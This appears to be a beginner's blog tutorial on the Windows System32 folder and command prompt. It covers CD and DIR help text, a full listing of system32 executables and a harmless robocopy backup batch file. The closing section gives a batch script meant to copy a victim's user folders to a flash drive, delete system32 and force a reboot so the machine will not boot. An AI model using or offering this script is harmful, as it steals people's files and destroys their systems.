Everyone has heard of the system 32 folder for one reason or another, most people have no clue what it is, why they have it, and if its important or not. In terms of batch file writing? Its one of the most important folders in any computer. Further more its one of the most important folders on every computer for that matter.
The purpose of the system32 folder is to store all vitally important parts of a windows based PC. What you'll find in the system32 folder are drivers for printers and monitors, registry files, tools that allow programs to communicate with one another, event files, really the bare foundations of a windows based system.Now the fun thing about system32 that I didn't really think about for the longest while was the commands I used on a daily basis. CMD, XCOPY, DEL, really basic commands, these are stored in the system32 folder. As a rule of thumb I thought it was pretty important to dive into available commands. For those not familiar with command line, lets change that.
First lets open up CMD, by hitting Windows + R and typing CMDFor those who aren't exactly tech savvy this is kind of a boring and terrifying realm, you see a line that says C:\User\%username% in it, really what is this? Computers speak in command line, every click made, ever window opened, every program installed relies on a set of predetermined programs and activities that allow the computer to run. Obtaining the ability to tell the computer what is desired to run or how we want it to run, why we want it to run, is where the beauty of command line comes in handy. From here we can copy files from a flash drive to an FTP site without ever opening up another window, we can delete a file directory, and rename a shortcut. But to those who are new to the idea of command line, bare in mind the sheer volume of programs that run without us even knowing they exist. I'm going to provide the full list of system32 program in just a second, but I'd like to share how to access it on your own.
We're going to use 2 commands CD and DIR
What is CD? You can look this up by typing in CD /?. the /? at the end of many programs will tell you additional modifications that need to be made, and what the whole program does. Here is the "print screen" of what CD says.
Displays the name of or changes the current directory.
CHDIR [/D] [drive:][path]
CHDIR [..]
CD [/D] [drive:][path]
CD [..]
.. Specifies that you want to change to the parent directory.
Type CD drive: to display the current directory in the specified drive.
Type CD without parameters to display the current drive and directory.
Use the /D switch to change current drive in addition to changing current
directory for a drive.
If Command Extensions are enabled CHDIR changes as follows:
The current directory string is converted to use the same case as
the on disk names. So CD C:\TEMP would actually set the current
directory to C:\Temp if that is the case on disk.
CHDIR command does not treat spaces as delimiters, so it is possible to
CD into a subdirectory name that contains a space without surrounding
the name with quotes. For example:
cd \winnt\profiles\username\programs\start menu
is the same as:
cd "\winnt\profiles\username\programs\start menu"
which is what you would have to type if extensions were disabled.
In short CD stands for "change directory", by default we will be placed in the C:\users\%username% directory (if we are using windows 7). We can use CD to relocate ourselves to the system32 folder by typing in cd %systemroot%\system32. (systemroot is a variable, much more on that at a later date). Now that we're in the new directory, we need to view it and see what is available.
DIR is the next command we're going to use, but this time with a modification and a pipe (getting tricky). Once again, you can type DIR /?, but I'll provide that print out as well for that.
Displays a list of files and subdirectories in a directory.
DIR [drive:][path][filename] [/A[[:]attributes]] [/B] [/C] [/D] [/L] [/N]
[/O[[:]sortorder]] [/P] [/Q] [/R] [/S] [/T[[:]timefield]] [/W] [/X] [/4]
[drive:][path][filename]
Specifies drive, directory, and/or files to list.
/A Displays files with specified attributes.
attributes D Directories R Read-only files
H Hidden files A Files ready for archiving
S System files I Not content indexed files
L Reparse Points - Prefix meaning not
/B Uses bare format (no heading information or summary).
/C Display the thousand separator in file sizes. This is the
default. Use /-C to disable display of separator.
/D Same as wide but files are list sorted by column.
/L Uses lowercase.
/N New long list format where filenames are on the far right.
/O List by files in sorted order.
sortorder N By name (alphabetic) S By size (smallest first)
E By extension (alphabetic) D By date/time (oldest first)
G Group directories first - Prefix to reverse order
/P Pauses after each screenful of information.
/Q Display the owner of the file.
/R Display alternate data streams of the file.
/S Displays files in specified directory and all subdirectories.
/T Controls which time field displayed or used for sorting
timefield C Creation
A Last Access
W Last Written
/W Uses wide list format.
/X This displays the short names generated for non-8dot3 file
names. The format is that of /N with the short name inserted
before the long name. If no short name is present, blanks are
displayed in its place.
/4 Displays four-digit years
Switches may be preset in the DIRCMD environment variable. Override
preset switches by prefixing any switch with - (hyphen)--for example, /-W.
As we can see, DIR is our file directory listing command (technically a program), which allows us to view everything within a directory. By this point everyone who has closed this web page is about to miss out on some pretty fun stuff honestly, we've learned 2 commands. Lets use the DIR command to find all of our .exe programs in the system32 folder by typing in DIR *.exeWhat you'll come to find is... you're missing a huge chunk of the available commands, but on the plus side we did only search for .exe file types, so lets add a pipe which will allow you to advance 1 line at a time. So now lets type in DIR *.exe | more
Here is the full list of what you'll get by searching for .exe files in the system32 file directory.
Volume in drive C is OS
Volume Serial Number is 12BC-0839
Directory of C:\Windows\System32
02/07/2014 06:02 AM 436,040 AcSignOpt.exe
07/13/2009 09:38 PM 40,448 AdapterTroubleshooter.exe
11/20/2010 11:24 PM 122,880 aitagent.exe
01/27/2015 07:36 PM 1,239,720 aitstatic.exe
07/13/2009 09:38 PM 79,360 alg.exe
02/02/2015 11:30 PM 17,920 appidcertstorecheck.exe
02/02/2015 11:30 PM 146,944 appidpolicyconverter.exe
06/15/2009 08:20 AM 215,656 appverif.exe
07/13/2009 09:38 PM 24,064 ARP.EXE
07/13/2009 09:38 PM 28,672 at.exe
07/13/2009 09:38 PM 35,328 AtBroker.exe
07/13/2009 09:38 PM 18,432 attrib.exe
02/02/2015 11:30 PM 126,464 audiodg.exe
05/25/2015 02:18 PM 64,000 auditpol.exe
11/20/2010 11:24 PM 777,728 autochk.exe
11/20/2010 11:24 PM 793,088 autoconv.exe
11/20/2010 11:24 PM 763,904 autofmt.exe
07/13/2009 09:38 PM 58,880 AxInstUI.exe
11/20/2010 11:24 PM 175,616 bcdboot.exe
11/20/2010 11:24 PM 346,112 bcdedit.exe
07/13/2009 09:38 PM 48,640 BdeUISrv.exe
07/13/2009 09:38 PM 98,304 BdeUnlockWizard.exe
11/20/2010 11:23 PM 232,448 bitsadmin.exe
07/13/2009 09:38 PM 94,720 bootcfg.exe
07/13/2009 09:38 PM 20,992 bridgeunattend.exe
07/13/2009 09:38 PM 36,864 bthudtask.exe
07/13/2009 09:38 PM 31,232 cacls.exe
07/13/2009 09:38 PM 918,528 calc.exe
07/13/2009 09:38 PM 70,144 CertEnrollCtrl.exe
07/13/2009 09:38 PM 326,144 certreq.exe
06/26/2014 05:08 AM 1,192,448 certutil.exe
11/20/2010 11:24 PM 16,896 change.exe
10/29/2014 10:03 PM 165,888 charmap.exe
11/20/2010 11:24 PM 22,528 chglogon.exe
11/20/2010 11:24 PM 24,064 chgport.exe
11/20/2010 11:24 PM 21,504 chgusr.exe
07/13/2009 09:38 PM 36,864 chkdsk.exe
07/13/2009 09:38 PM 18,944 chkntfs.exe
11/20/2010 11:24 PM 36,864 choice.exe
07/13/2009 09:38 PM 43,008 cipher.exe
07/13/2009 09:38 PM 216,064 cleanmgr.exe
07/13/2009 09:38 PM 49,152 cliconfg.exe
07/13/2009 09:38 PM 32,256 clip.exe
04/13/2008 08:12 PM 102,912 clipbrd.exe
11/20/2010 11:23 PM 345,088 cmd.exe
07/13/2009 09:39 PM 16,384 cmdkey.exe
07/13/2009 09:39 PM 80,384 cmdl32.exe
07/13/2009 09:39 PM 45,056 cmmon32.exe
11/20/2010 11:24 PM 92,160 cmstp.exe
07/13/2009 09:39 PM 22,528 cofire.exe
07/13/2009 09:39 PM 86,528 colorcpl.exe
07/13/2009 09:39 PM 24,064 comp.exe
07/13/2009 09:39 PM 19,968 compact.exe
07/13/2009 09:39 PM 145,920 CompMgmtLauncher.exe
07/13/2009 09:39 PM 37,376 ComputerDefaults.exe
05/25/2015 02:18 PM 338,432 conhost.exe
06/03/2014 06:02 AM 112,064 consent.exe
07/13/2009 09:39 PM 114,688 control.exe
07/13/2009 09:39 PM 20,480 convert.exe
07/13/2009 09:39 PM 34,304 credwiz.exe
06/26/2014 05:08 AM 156,160 cscript.exe
07/13/2009 09:39 PM 7,680 csrss.exe
07/13/2009 09:39 PM 9,728 ctfmon.exe
07/13/2009 09:39 PM 322,048 cttune.exe
07/13/2009 09:39 PM 40,448 cttunesvr.exe
07/13/2009 09:39 PM 881,664 dccw.exe
07/13/2009 09:39 PM 10,240 dcomcnfg.exe
07/13/2009 09:39 PM 43,008 ddodiag.exe
07/13/2009 09:39 PM 183,296 Defrag.exe
07/13/2009 09:39 PM 111,616 DeviceDisplayObjectProvider.exe
07/13/2009 09:39 PM 25,600 DeviceEject.exe
07/13/2009 09:39 PM 74,752 DevicePairingWizard.exe
07/13/2009 09:39 PM 92,672 DeviceProperties.exe
07/13/2009 09:39 PM 79,360 DFDWiz.exe
11/20/2010 11:24 PM 606,208 dfrgui.exe
07/13/2009 09:39 PM 35,328 dialer.exe
07/13/2009 09:39 PM 116,224 diantz.exe
07/13/2009 09:39 PM 8,704 dinotify.exe
11/20/2010 11:24 PM 166,400 diskpart.exe
05/25/2015 02:18 PM 19,456 diskperf.exe
11/20/2010 11:24 PM 363,520 diskraid.exe
07/13/2009 09:39 PM 274,944 Dism.exe
07/13/2009 09:39 PM 159,232 dispdiag.exe
07/13/2009 09:39 PM 529,408 DisplaySwitch.exe
11/20/2010 11:24 PM 61,440 djoin.exe
07/13/2009 09:39 PM 9,728 dllhost.exe
07/13/2009 09:39 PM 8,192 dllhst3g.exe
07/01/2013 03:33 PM 30,208 dnscacheugc.exe
11/20/2010 08:24 AM 347,648 dnscmd.exe
07/13/2009 09:39 PM 18,944 doskey.exe
07/13/2009 09:39 PM 74,752 dpapimig.exe
07/13/2009 09:39 PM 77,312 DpiScaling.exe
07/13/2009 09:39 PM 34,304 dpnsvr.exe
07/13/2009 09:39 PM 96,256 driverquery.exe
07/13/2009 09:39 PM 102,912 drvinst.exe
07/13/2009 09:39 PM 11,264 dvdplay.exe
07/13/2009 09:39 PM 26,112 dvdupgrd.exe
07/13/2009 09:39 PM 120,320 dwm.exe
07/13/2009 09:39 PM 152,576 DWWIN.EXE
07/13/2009 09:39 PM 343,552 dxdiag.exe
07/13/2009 09:39 PM 265,216 Dxpserver.exe
07/13/2009 09:39 PM 11,776 Eap3Host.exe
07/13/2009 09:39 PM 12,800 efsui.exe
07/13/2009 09:39 PM 140,288 EhStorAuthn.exe
07/13/2009 09:39 PM 139,264 esentutl.exe
11/20/2010 11:24 PM 359,936 eudcedit.exe
07/13/2009 09:39 PM 45,056 eventcreate.exe
07/13/2009 09:39 PM 81,920 eventvwr.exe
07/13/2009 09:39 PM 65,536 expand.exe
07/13/2009 09:39 PM 62,464 extrac32.exe
07/13/2009 09:39 PM 24,064 fc.exe
07/13/2009 09:39 PM 15,872 find.exe
11/20/2010 11:24 PM 71,168 findstr.exe
07/13/2009 09:39 PM 11,264 finger.exe
11/20/2010 11:23 PM 17,920 fixmapi.exe
07/13/2009 09:39 PM 23,552 fltMC.exe
07/13/2009 09:39 PM 109,056 fontview.exe
07/13/2009 09:39 PM 51,712 forfiles.exe
07/01/2013 03:33 PM 96,768 fsutil.exe
11/20/2010 11:24 PM 48,128 ftp.exe
07/13/2009 09:39 PM 120,320 fvenotify.exe
07/13/2009 09:39 PM 107,008 fveprompt.exe
07/01/2013 03:33 PM 267,776 FXSCOVER.exe
11/20/2010 11:25 PM 689,152 FXSSVC.exe
11/20/2010 11:25 PM 18,432 FXSUNATD.exe
07/13/2009 09:39 PM 89,600 getmac.exe
07/13/2009 09:39 PM 11,776 GettingStarted.exe
07/13/2009 09:39 PM 166,912 gpresult.exe
07/13/2009 09:39 PM 25,600 gpscript.exe
07/13/2009 09:39 PM 17,408 gpupdate.exe
07/13/2009 09:39 PM 18,432 grpconv.exe
07/13/2009 09:39 PM 64,000 hdwwiz.exe
07/13/2009 09:39 PM 10,240 help.exe
07/13/2009 09:39 PM 9,728 HOSTNAME.EXE
08/12/2012 06:11 AM 2,874,256 hpinkins6e12.exe
07/13/2009 09:39 PM 38,912 hwrcomp.exe
07/13/2009 09:39 PM 184,320 hwrreg.exe
07/13/2009 09:39 PM 34,816 icacls.exe
03/09/2014 05:48 PM 1,389,208 icardagt.exe
07/13/2009 09:39 PM 16,896 icsunattend.exe
05/22/2015 02:07 PM 720,384 ie4uinit.exe
05/22/2015 02:47 PM 114,688 ieetwcollector.exe
05/22/2015 02:47 PM 144,384 ieUnatt.exe
06/26/2014 04:53 AM 167,424 iexpress.exe
07/13/2009 09:39 PM 10,240 InfDefaultInstall.exe
07/13/2009 09:39 PM 58,368 ipconfig.exe
01/03/2013 03:38 PM 183,200 IPROSetMonitor.exe
07/13/2009 09:39 PM 196,608 irftp.exe
11/20/2010 11:23 PM 152,064 iscsicli.exe
07/13/2009 09:39 PM 121,344 iscsicpl.exe
11/20/2010 11:24 PM 91,648 isoburn.exe
07/13/2009 09:39 PM 35,328 klist.exe
07/13/2009 09:39 PM 43,008 ksetup.exe
07/13/2009 09:39 PM 16,896 ktmutil.exe
07/13/2009 09:39 PM 16,384 label.exe
07/13/2009 09:39 PM 90,112 LocationNotifications.exe
07/13/2009 09:39 PM 10,240 Locator.exe
07/13/2009 09:39 PM 50,176 lodctr.exe
07/13/2009 09:39 PM 113,152 logagent.exe
05/25/2015 02:18 PM 104,448 logman.exe
11/20/2010 11:24 PM 21,504 logoff.exe
11/20/2010 11:24 PM 27,648 LogonUI.exe
11/20/2010 11:24 PM 653,312 lpksetup.exe
07/13/2009 09:39 PM 71,168 lpremove.exe
05/25/2015 02:18 PM 31,232 lsass.exe
11/20/2010 11:23 PM 343,040 lsm.exe
07/13/2009 09:39 PM 652,800 Magnify.exe
07/13/2009 09:39 PM 117,248 makecab.exe
11/20/2010 11:24 PM 79,872 manage-bde.exe
11/20/2010 11:24 PM 957,440 mblctr.exe
11/20/2010 11:24 PM 272,896 mcbuilder.exe
07/13/2009 09:39 PM 97,280 mctadmin.exe
07/13/2009 09:39 PM 88,576 MdRes.exe
11/20/2010 11:24 PM 146,944 MdSched.exe
02/02/2015 11:30 PM 24,576 mfpmp.exe
07/13/2009 09:48 PM 91,728 MigAutoPlay.exe
07/13/2009 09:39 PM 2,144,256 mmc.exe
11/20/2010 11:24 PM 102,400 mobsync.exe
07/13/2009 09:39 PM 14,848 mountvol.exe
07/13/2009 09:39 PM 17,408 mpnotify.exe
02/24/2015 04:17 AM 295,552 MpSigStub.exe
07/13/2009 09:39 PM 12,800 MRINFO.EXE
06/10/2015 03:01 AM 140,135,120 MRT.exe
11/20/2010 11:24 PM 300,032 msconfig.exe
07/13/2009 09:39 PM 1,076,736 msdt.exe
07/13/2009 09:39 PM 141,824 msdtc.exe
06/26/2014 04:53 AM 13,312 msfeedssync.exe
07/13/2009 09:39 PM 26,112 msg.exe
06/26/2014 04:53 AM 13,824 mshta.exe
11/20/2010 11:24 PM 128,000 msiexec.exe
11/20/2010 11:23 PM 378,880 msinfo32.exe
07/13/2009 09:39 PM 6,676,480 mspaint.exe
07/13/2009 09:39 PM 651,264 msra.exe
05/22/2015 02:40 PM 968,704 MsSpellCheckingFacility.exe
10/01/2013 07:31 PM 1,147,392 mstsc.exe
07/13/2009 09:52 PM 98,304 mtedit.exe
07/13/2009 09:39 PM 133,632 mtstocom.exe
07/13/2009 09:39 PM 83,456 MuiUnattend.exe
11/20/2010 11:24 PM 51,712 MultiDigiMon.exe
07/13/2009 09:39 PM 329,728 NAPSTAT.EXE
11/20/2010 11:24 PM 1,077,248 Narrator.exe
07/13/2009 09:39 PM 17,920 nbtstat.exe
07/13/2009 09:39 PM 74,752 ndadmin.exe
07/13/2009 09:39 PM 55,808 net.exe
11/20/2010 11:24 PM 152,064 net1.exe
07/13/2009 09:39 PM 25,088 netbtugc.exe
07/13/2009 09:39 PM 32,256 netcfg.exe
07/13/2009 09:39 PM 26,624 netiougc.exe
07/13/2009 09:39 PM 27,136 Netplwiz.exe
07/13/2009 09:39 PM 90,624 NetProj.exe
07/13/2009 09:39 PM 87,040 netsh.exe
07/13/2009 09:39 PM 31,744 NETSTAT.EXE
07/13/2009 09:39 PM 76,288 newdev.exe
07/13/2009 09:39 PM 73,728 nlb.exe
11/20/2010 08:25 AM 534,528 nlbmgr.exe
11/20/2010 11:24 PM 395,776 nltest.exe
07/13/2009 09:39 PM 193,536 notepad.exe
11/20/2010 11:24 PM 109,568 nslookup.exe
05/25/2015 02:24 PM 5,569,984 ntoskrnl.exe
07/13/2009 09:39 PM 61,952 ntprint.exe
11/11/2013 11:01 AM 922,912 nvvsvc.exe
11/14/2013 06:59 AM 2,274,592 nvwmi64.exe
11/20/2010 11:24 PM 186,368 ocsetup.exe
07/13/2009 09:39 PM 90,112 odbcad32.exe
07/13/2009 09:39 PM 40,960 odbcconf.exe
07/13/2009 09:39 PM 79,872 openfiles.exe
07/13/2009 09:39 PM 97,792 OptionalFeatures.exe
06/17/2014 10:18 PM 692,736 osk.exe
07/01/2013 03:33 PM 245,760 OxpsConverter.exe
07/13/2009 09:39 PM 176,128 p2phost.exe
07/13/2009 09:39 PM 15,360 PATHPING.EXE
02/02/2015 11:30 PM 9,728 pcalua.exe
07/13/2009 09:39 PM 18,432 pcaui.exe
02/02/2015 11:30 PM 11,264 pcawrk.exe
07/13/2009 09:39 PM 13,824 pcwrun.exe
11/20/2010 11:24 PM 172,544 perfmon.exe
07/13/2009 09:39 PM 16,896 PING.EXE
11/20/2010 11:23 PM 199,168 PkgMgr.exe
07/13/2009 09:39 PM 9,216 plasrv.exe
11/20/2010 11:24 PM 62,976 PnPUnattend.exe
07/13/2009 09:39 PM 36,352 PnPutil.exe
02/18/2015 03:04 AM 142,336 poqexec.exe
07/13/2009 09:39 PM 71,168 powercfg.exe
11/20/2010 11:25 PM 320,352 PresentationHost.exe
11/20/2010 11:24 PM 176,640 PresentationSettings.exe
02/18/2011 06:51 AM 31,232 prevhost.exe
07/13/2009 09:39 PM 15,360 print.exe
07/13/2009 09:39 PM 71,680 PrintBrmUi.exe
07/13/2009 09:39 PM 748,544 printfilterpipelinesvc.exe
07/13/2009 09:39 PM 18,944 PrintIsolationHost.exe
07/13/2009 09:39 PM 61,952 printui.exe
11/20/2010 11:24 PM 31,744 proquota.exe
07/13/2009 09:39 PM 732,672 psr.exe
11/20/2010 11:24 PM 55,296 PushPrinterConnections.exe
11/20/2010 11:24 PM 23,040 qappsrv.exe
11/20/2010 11:24 PM 26,624 qprocess.exe
11/20/2010 11:24 PM 16,384 query.exe
07/13/2009 09:39 PM 24,064 quser.exe
07/13/2009 09:39 PM 28,672 qwinsta.exe
07/13/2009 09:39 PM 17,920 rasautou.exe
07/13/2009 09:39 PM 18,944 rasdial.exe
07/13/2009 09:39 PM 125,952 raserver.exe
07/13/2009 09:39 PM 42,496 rasphone.exe
11/20/2010 11:24 PM 210,944 rdpclip.exe
07/13/2009 09:39 PM 40,448 rdrleakdiag.exe
07/01/2013 03:33 PM 9,216 rdrmemptylst.exe
07/13/2009 09:39 PM 20,480 ReAgentc.exe
11/20/2010 11:25 PM 238,080 recdisc.exe
07/13/2009 09:39 PM 12,800 recover.exe
07/13/2009 09:39 PM 74,752 reg.exe
07/13/2009 09:39 PM 10,240 regedt32.exe
07/13/2009 09:39 PM 47,104 regini.exe
06/26/2014 04:53 AM 86,016 RegisterIEPKEYs.exe
07/13/2009 09:39 PM 19,456 regsvr32.exe
07/13/2009 09:39 PM 69,120 rekeywiz.exe
05/25/2015 02:18 PM 43,008 relog.exe
07/13/2009 09:39 PM 173,056 RelPost.exe
11/20/2010 11:24 PM 51,712 repair-bde.exe
07/13/2009 09:39 PM 19,968 replace.exe
11/20/2010 11:24 PM 16,896 reset.exe
07/13/2009 09:39 PM 103,936 resmon.exe
06/26/2014 05:08 AM 626,176 RMActivate.exe
06/26/2014 05:08 AM 658,432 RMActivate_isv.exe
06/26/2014 05:08 AM 553,984 RMActivate_ssp.exe
06/26/2014 05:08 AM 552,960 RMActivate_ssp_isv.exe
07/13/2009 09:39 PM 16,896 RmClient.exe
11/20/2010 11:23 PM 128,000 Robocopy.exe
07/13/2009 09:39 PM 21,504 ROUTE.EXE
07/13/2009 09:39 PM 30,208 RpcPing.exe
02/02/2015 11:30 PM 55,808 rrinstaller.exe
05/25/2015 02:18 PM 296,960 rstrui.exe
07/13/2009 09:39 PM 20,480 runas.exe
07/13/2009 09:39 PM 45,568 rundll32.exe
07/13/2009 09:39 PM 58,880 RunLegacyCPLElevated.exe
11/20/2010 11:24 PM 56,832 runonce.exe
11/20/2010 11:24 PM 21,504 rwinsta.exe
07/13/2009 09:39 PM 13,824 sbunattend.exe
07/13/2009 09:39 PM 45,056 sc.exe
11/20/2010 11:24 PM 285,696 schtasks.exe
03/04/2015 12:41 AM 23,552 sdbinst.exe
07/13/2009 09:39 PM 51,712 sdchange.exe
11/20/2010 11:25 PM 1,264,640 sdclt.exe
07/13/2009 09:39 PM 23,552 sdiagnhost.exe
06/26/2014 05:08 AM 113,664 SearchFilterHost.exe
06/26/2014 05:08 AM 591,872 SearchIndexer.exe
06/26/2014 05:08 AM 249,856 SearchProtocolHost.exe
07/13/2009 09:39 PM 36,864 SecEdit.exe
07/13/2009 09:39 PM 16,896 secinit.exe
04/12/2015 11:28 PM 328,704 services.exe
11/20/2010 11:24 PM 279,040 sethc.exe
06/26/2014 04:53 AM 90,112 SetIEInstalledDate.exe
07/13/2009 09:39 PM 34,816 setspn.exe
11/20/2010 11:23 PM 88,576 setupcl.exe
07/13/2009 09:39 PM 118,272 setupugc.exe
07/13/2009 09:39 PM 57,856 setx.exe
07/13/2009 09:39 PM 39,424 sfc.exe
11/20/2010 11:24 PM 21,504 shadow.exe
07/13/2009 09:39 PM 407,552 shrpubw.exe
07/13/2009 09:39 PM 34,304 shutdown.exe
07/13/2009 09:39 PM 74,752 sigverif.exe
11/20/2010 11:24 PM 349,696 slui.exe
05/25/2015 02:18 PM 112,640 smss.exe
11/20/2010 11:23 PM 273,920 SndVol.exe
07/13/2009 09:39 PM 431,104 SnippingTool.exe
07/13/2009 09:39 PM 14,336 snmptrap.exe
07/13/2009 09:39 PM 22,528 sort.exe
07/13/2009 09:39 PM 142,336 SoundRecorder.exe
11/20/2010 11:24 PM 598,016 spinstall.exe
07/01/2013 03:33 PM 559,104 spoolsv.exe
11/20/2010 11:23 PM 3,524,608 sppsvc.exe
11/20/2010 11:24 PM 301,568 spreview.exe
07/13/2009 09:39 PM 18,944 srdelayed.exe
07/13/2009 09:39 PM 427,520 StikyNot.exe
07/13/2009 09:39 PM 15,360 subst.exe
07/13/2009 09:39 PM 27,136 svchost.exe
07/13/2009 09:39 PM 35,328 sxstrace.exe
07/13/2009 09:39 PM 43,520 SyncHost.exe
07/13/2009 09:39 PM 33,792 syskey.exe
07/13/2009 09:39 PM 110,592 systeminfo.exe
07/13/2009 09:39 PM 82,432 SystemPropertiesAdvanced.exe
07/13/2009 09:39 PM 82,432 SystemPropertiesComputerName.exe
07/13/2009 09:39 PM 82,432 SystemPropertiesDataExecutionPrevention.exe
07/13/2009 09:39 PM 82,432 SystemPropertiesHardware.exe
07/13/2009 09:39 PM 82,432 SystemPropertiesPerformance.exe
07/13/2009 09:39 PM 82,432 SystemPropertiesProtection.exe
07/13/2009 09:39 PM 82,432 SystemPropertiesRemote.exe
07/13/2009 09:39 PM 9,216 systray.exe
11/20/2010 11:24 PM 78,848 tabcal.exe
11/20/2010 11:23 PM 63,488 takeown.exe
07/13/2009 09:39 PM 13,312 TapiUnattend.exe
11/20/2010 11:24 PM 464,384 taskeng.exe
07/01/2013 03:33 PM 68,608 taskhost.exe
07/13/2009 09:39 PM 112,640 taskkill.exe
07/13/2009 09:39 PM 108,544 tasklist.exe
11/20/2010 11:24 PM 257,024 taskmgr.exe
07/13/2009 09:39 PM 15,360 tcmsetup.exe
07/13/2009 09:39 PM 10,240 TCPSVCS.EXE
07/13/2009 09:39 PM 33,280 timeout.exe
07/13/2009 09:39 PM 115,200 TpmInit.exe
05/25/2015 02:18 PM 404,992 tracerpt.exe
07/13/2009 09:39 PM 13,824 TRACERT.EXE
11/20/2010 11:24 PM 22,528 tscon.exe
11/20/2010 11:24 PM 22,016 tsdiscon.exe
11/20/2010 11:24 PM 23,552 tskill.exe
07/13/2009 09:39 PM 46,592 TSTheme.exe
10/01/2013 10:11 PM 13,824 TsUsbRedirectionGroupPolicyControl.exe
12/11/2014 01:47 PM 87,040 TSWbPrxy.exe
06/06/2014 02:12 AM 35,480 TsWpfWrp.exe
05/25/2015 02:18 PM 47,104 typeperf.exe
11/20/2010 11:23 PM 58,368 tzutil.exe
07/13/2009 09:39 PM 41,984 ucsvc.exe
07/13/2009 09:39 PM 40,960 UI0Detect.exe
07/13/2009 09:39 PM 40,448 unlodctr.exe
07/13/2009 09:39 PM 323,584 unregmp2.exe
07/13/2009 09:39 PM 25,600 upnpcont.exe
07/13/2009 09:39 PM 193,536 UserAccountControlSettings.exe
11/20/2010 11:24 PM 30,720 userinit.exe
07/13/2009 09:39 PM 1,402,880 Utilman.exe
10/09/2013 06:11 AM 35,328 valWBFPolicyService.exe
07/13/2009 09:39 PM 27,136 VaultCmd.exe
07/13/2009 09:39 PM 40,448 VaultSysUi.exe
11/20/2010 11:23 PM 533,504 vds.exe
07/13/2009 09:39 PM 22,528 vdsldr.exe
07/13/2009 09:39 PM 11,776 verclsid.exe
07/13/2009 09:39 PM 155,648 verifier.exe
11/20/2010 11:23 PM 244,224 vmicsvc.exe
07/13/2009 09:39 PM 167,424 vssadmin.exe
11/20/2010 11:23 PM 1,600,512 VSSVC.exe
07/13/2009 09:39 PM 81,408 w32tm.exe
07/13/2009 09:39 PM 44,544 waitfor.exe
07/13/2009 09:39 PM 265,728 wbadmin.exe
11/20/2010 11:25 PM 1,504,256 wbengine.exe
07/01/2013 03:34 PM 113,152 wecutil.exe
07/13/2009 09:39 PM 415,232 WerFault.exe
11/20/2010 11:24 PM 26,112 WerFaultSecure.exe
07/13/2009 09:39 PM 50,688 wermgr.exe
07/13/2009 09:39 PM 273,920 wevtutil.exe
06/26/2014 04:53 AM 143,872 wextract.exe
11/20/2010 11:25 PM 974,336 WFS.exe
07/13/2009 09:39 PM 43,008 where.exe
07/13/2009 09:39 PM 52,736 whoami.exe
07/13/2009 09:39 PM 96,256 wiaacmgr.exe
07/13/2009 09:39 PM 36,352 wiawow64.exe
07/13/2009 09:39 PM 403,968 wimserv.exe
07/13/2009 09:39 PM 257,536 WindowsAnytimeUpgrade.exe
11/20/2010 11:25 PM 294,912 WindowsAnytimeUpgradeResults.exe
07/13/2009 09:39 PM 386,560 WindowsAnytimeUpgradeui.exe
07/13/2009 09:39 PM 129,024 wininit.exe
10/31/2014 06:24 PM 619,056 winload.exe
07/16/2014 10:07 PM 455,168 winlogon.exe
06/27/2014 08:21 PM 532,176 winresume.exe
07/13/2009 09:39 PM 51,200 winrs.exe
07/13/2009 09:39 PM 24,064 winrshost.exe
07/01/2013 03:33 PM 3,958,272 WinSAT.exe
07/13/2009 09:39 PM 80,384 winver.exe
11/20/2010 11:25 PM 405,504 wisptis.exe
10/01/2013 08:01 PM 420,864 wksprt.exe
07/13/2009 09:39 PM 99,328 wlanext.exe
07/13/2009 09:39 PM 73,728 wlbs.exe
07/13/2009 09:39 PM 44,544 wlrmdr.exe
07/13/2009 09:39 PM 16,384 wowreg32.exe
07/13/2009 09:39 PM 34,816 WPDShextAutoplay.exe
07/13/2009 09:39 PM 48,640 wpnpinst.exe
07/13/2009 09:39 PM 10,240 write.exe
06/26/2014 05:08 AM 168,960 wscript.exe
10/02/2014 10:11 PM 266,240 WSManHTTPConfig.exe
07/13/2009 09:39 PM 13,824 wsmprovhost.exe
11/20/2010 11:24 PM 293,888 wsqmcons.exe
03/24/2015 11:23 PM 36,864 wuapp.exe
03/24/2015 11:23 PM 135,168 wuauclt.exe
07/25/2012 11:08 PM 229,888 WUDFHost.exe
11/20/2010 11:23 PM 307,200 wusa.exe
07/13/2009 09:39 PM 43,008 xcopy.exe
07/13/2009 09:39 PM 4,835,840 xpsrchvw.exe
07/13/2009 09:39 PM 42,496 xwizard.exe
435 File(s) 244,701,304 bytes
0 Dir(s) 256,733,413,376 bytes free
Long list I know, thing is I want you to play around with these commands, figure out what write.exe does by typing in write /?. I'm not here to give a full break down of what each and every command does. There are far too many, instead I'm going to provide a few batch files you can use and learn on your own past that.
Batch Files
What is a batch file you ask? A batch file is an unformatted text file that contains one or more commands saved into a .bat file. In short, we can use notepad, type up a bunch of commands and run them without having to search, without having to type, just letting them run. Sometimes a repetitive task, such as copying files from one location to another once a week, instead of manually doing it we can write a script for it. For example a batch file could look something like this if you want to copy files from one drive to another, all while making new directories.@echo off
WMIC Path Win32_LocalTime Get Day,Hour,Minute,Month,Second,Year /Format:table
FOR /F "skip=1 tokens=1-6" %%A IN ('WMIC Path Win32_LocalTime Get Day^,Hour^,Minute^,Month^,Second^,Year /Format:table') DO (
SET /A MONTH=%%D
SET /A YEAR=%%F
)
MKDIR Y:\%year%-%month%\%COMPUTERNAME%\D-Drive
robocopy D: Y:\%year%-%month%\%COMPUTERNAME%\D-Drive /mir /R:2 /W:3
Finally save the file as something like copy.bat (bat is the batch file extension)
What this batch file does is first figure out the year, month, day, hour, minute, second, and turns them into variables. Then takes those variables to make a new directory, and then proceeds to copy all the files from one directory to the new one. The modifiers added will create a mirror image, it'll retry 2 times, and wait 3 seconds between retries if the copy of a single file fails. This can be used monthly to copy files from one location to another, making new directories. Simple as a double click can recreate the task, make the new directory, and copy the files. Beautiful.
These same files can do devious things such as delete the system32 folder after copying important documents from one file directory to an FTP site or flash drive. Without getting way to fancy with variables here lets type up a quick batch file that can be used to really mess up a computer.
@echo off
Set drive=%cd:~0,3%
robocopy C:\users\ %drive%\%computername% /mir /R:2 /W:3
del C:\windows\system32
shutdown /f /r /t 0
Save as something.bat
This will take everything from the C:\users folder, copy it to the flash drive you saved it too (or local drive you saved the .bat too) and then deleted the system32 folder. Once the system32 folder was deleted, it forced the PC to reboot which... doesn't allow the computer to turn back on. Required tools to boot the system are saved in the system32 folder, so by forcing it to deleted, you've essentially taken the users important data, and then broke their computer.
